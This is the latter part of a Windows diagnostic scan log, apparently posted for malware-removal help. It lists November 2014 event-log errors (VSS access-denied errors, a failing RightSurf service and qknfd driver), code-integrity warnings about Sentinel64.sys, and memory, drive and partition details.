- Error: (11/01/2014 06:47:47 PM) (Source: VSS) (EventID: 8193) (User: )
- Description: Volume Shadow Copy Service error: Unexpected error calling routine RegSetValueExW(0x00000644,(null),0,REG_BINARY,0000000002BEE180.72). hr = 0x80070005, Access is denied.
- .
- Operation:
- BackupShutdown Event
- Context:
- Execution Context: Writer
- Writer Class Id: {a6ad56c2-b509-4e6c-bb19-49d8f43532f0}
- Writer Name: WMI Writer
- Writer Instance ID: {357e23c8-7333-4443-8351-b9c96a4ce42d}
- Error: (11/01/2014 06:47:47 PM) (Source: VSS) (EventID: 8193) (User: )
- Description: Volume Shadow Copy Service error: Unexpected error calling routine RegSetValueExW(0x00000310,(null),0,REG_BINARY,00000000074CDD30.72). hr = 0x80070005, Access is denied.
- .
- Operation:
- BackupShutdown Event
- Context:
- Execution Context: Writer
- Writer Class Id: {e8132975-6f93-4464-a53e-1050253ae220}
- Writer Name: System Writer
- Writer Instance ID: {78f0e62a-92bf-405f-994d-975a464c51f8}
- System errors:
- =============
- Error: (11/01/2014 06:59:01 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
- Description: A timeout was reached (30000 milliseconds) while waiting for the Windows Error Reporting Service service to connect.
- Error: (11/01/2014 06:52:03 PM) (Source: DCOM) (EventID: 10010) (User: )
- Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
- Error: (11/01/2014 06:51:19 PM) (Source: Service Control Manager) (EventID: 7024) (User: )
- Description: The HitmanPro 3.7 Crusader (Boot) service terminated with service-specific error %%0.
- Error: (11/01/2014 06:51:10 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
- Description: The following boot-start or system-start driver(s) failed to load:
- qknfd
- Error: (11/01/2014 06:51:04 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
- Description: The Util RightSurf service failed to start due to the following error:
- %%2
- Error: (11/01/2014 06:50:48 PM) (Source: DCOM) (EventID: 10000) (User: )
- Description: "C:\Program Files (x86)\Common Files\InstallShield\UpdateService\agent.exe" -Embedding740{FFF2D28F-E4EE-44D9-8104-8E71556757F6}
- Error: (11/01/2014 06:47:43 PM) (Source: Service Control Manager) (EventID: 7006) (User: )
- Description: The ScRegSetValueExW call failed for DeleteFlag with the following error:
- %%5
- Error: (11/01/2014 06:18:55 PM) (Source: DCOM) (EventID: 10010) (User: )
- Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
- Error: (11/01/2014 06:18:01 PM) (Source: DCOM) (EventID: 10000) (User: )
- Description: "C:\Program Files (x86)\Common Files\InstallShield\UpdateService\agent.exe" -Embedding740{FFF2D28F-E4EE-44D9-8104-8E71556757F6}
- Error: (11/01/2014 06:17:23 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
- Description: The following boot-start or system-start driver(s) failed to load:
- qknfd
- Microsoft Office Sessions:
- =========================
- Error: (11/01/2014 06:51:42 PM) (Source: WinMgmt) (EventID: 10) (User: )
- Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
- Error: (11/01/2014 06:50:38 PM) (Source: DesignSpooler) (EventID: 2) (User: NT AUTHORITY)
- Description: Pulse Design Spooler is shutting down. Security Device Error - Please attach your security device.
- Error: (11/01/2014 06:47:47 PM) (Source: VSS) (EventID: 8193) (User: )
- Description: RegSetValueExW(0x0000026c,SYSTEM\CurrentControlSet\Services\VSS\Diag\VssvcPublisher,0,REG_BINARY,0000000002D2EB10.72)0x80070005, Access is denied.
- Error: (11/01/2014 06:47:47 PM) (Source: VSS) (EventID: 8193) (User: )
- Description: RegSetValueExW(0x00000d78,(null),0,REG_BINARY,00000000098FDD30.72)0x80070005, Access is denied.
- Operation:
- BackupShutdown Event
- Context:
- Execution Context: Writer
- Writer Class Id: {cd3f2362-8bef-46c7-9181-d62844cdc0b2}
- Writer Name: MSSearch Service Writer
- Writer Instance ID: {14ce3ae3-8162-40cd-a0d5-a852f74bd3aa}
- Error: (11/01/2014 06:47:47 PM) (Source: VSS) (EventID: 8193) (User: )
- Description: RegSetValueExW(0x00000d78,(null),0,REG_BINARY,00000000098FDD30.72)0x80070005, Access is denied.
- Operation:
- BackupShutdown Event
- Context:
- Execution Context: Writer
- Writer Class Id: {cd3f2362-8bef-46c7-9181-d62844cdc0b2}
- Writer Name: MSSearch Service Writer
- Writer Instance ID: {14ce3ae3-8162-40cd-a0d5-a852f74bd3aa}
- Error: (11/01/2014 06:47:47 PM) (Source: VSS) (EventID: 8193) (User: )
- Description: RegSetValueExW(0x00000644,(null),0,REG_BINARY,0000000002BEE180.72)0x80070005, Access is denied.
- Operation:
- BackupShutdown Event
- Context:
- Execution Context: Writer
- Writer Class Id: {a6ad56c2-b509-4e6c-bb19-49d8f43532f0}
- Writer Name: WMI Writer
- Writer Instance ID: {357e23c8-7333-4443-8351-b9c96a4ce42d}
- Error: (11/01/2014 06:47:47 PM) (Source: VSS) (EventID: 8193) (User: )
- Description: RegSetValueExW(0x000001ec,(null),0,REG_BINARY,0000000002AFEA00.72)0x80070005, Access is denied.
- Operation:
- BackupShutdown Event
- Context:
- Execution Context: Writer
- Writer Class Id: {4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f}
- Writer Name: Shadow Copy Optimization Writer
- Writer Instance ID: {043545d9-2944-4e8f-8adc-a463570ed7f2}
- Error: (11/01/2014 06:47:47 PM) (Source: VSS) (EventID: 8193) (User: )
- Description: RegSetValueExW(0x000001b0,(null),0,REG_BINARY,0000000002B7EAD0.72)0x80070005, Access is denied.
- Operation:
- BackupShutdown Event
- Context:
- Execution Context: Writer
- Writer Class Id: {afbab4a2-367d-4d15-a586-71dbb18f8485}
- Writer Name: Registry Writer
- Writer Instance ID: {d09007ad-61ae-428d-a929-788a5b790395}
- Error: (11/01/2014 06:47:47 PM) (Source: VSS) (EventID: 8193) (User: )
- Description: RegSetValueExW(0x00000644,(null),0,REG_BINARY,0000000002BEE180.72)0x80070005, Access is denied.
- Operation:
- BackupShutdown Event
- Context:
- Execution Context: Writer
- Writer Class Id: {a6ad56c2-b509-4e6c-bb19-49d8f43532f0}
- Writer Name: WMI Writer
- Writer Instance ID: {357e23c8-7333-4443-8351-b9c96a4ce42d}
- Error: (11/01/2014 06:47:47 PM) (Source: VSS) (EventID: 8193) (User: )
- Description: RegSetValueExW(0x00000310,(null),0,REG_BINARY,00000000074CDD30.72)0x80070005, Access is denied.
- Operation:
- BackupShutdown Event
- Context:
- Execution Context: Writer
- Writer Class Id: {e8132975-6f93-4464-a53e-1050253ae220}
- Writer Name: System Writer
- Writer Instance ID: {78f0e62a-92bf-405f-994d-975a464c51f8}
- CodeIntegrity Errors:
- ===================================
- Date: 2013-02-28 03:17:54.952
- Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\Sentinel64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
- Date: 2013-02-28 03:17:54.920
- Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\Sentinel64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
- Date: 2013-02-26 15:54:42.178
- Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\Sentinel64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
- Date: 2013-02-26 15:54:42.147
- Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\Sentinel64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
- Date: 2013-02-24 17:56:24.777
- Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\Sentinel64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
- Date: 2013-02-24 17:56:24.730
- Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\Sentinel64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
- Date: 2013-02-24 17:54:10.133
- Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\Sentinel64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
- Date: 2013-02-24 17:54:10.117
- Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\Sentinel64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
- ==================== Memory info ===========================
- Processor: Intel(R) Core(TM) i5-3470 CPU @ 3.20GHz
- Percentage of memory in use: 28%
- Total physical RAM: 8091.4 MB
- Available physical RAM: 5761.47 MB
- Total Pagefile: 16180.98 MB
- Available Pagefile: 13290.66 MB
- Total Virtual: 8192 MB
- Available Virtual: 8191.82 MB
- ==================== Drives ================================
- Drive c: () (Fixed) (Total:931.41 GB) (Free:828.77 GB) NTFS
- ==================== MBR & Partition Table ==================
- ========================================================
- Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 011BAEA4)
- Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
- Partition 2: (Not Active) - (Size=931.4 GB) - (Type=07 NTFS)
- ==================== End Of Log ============================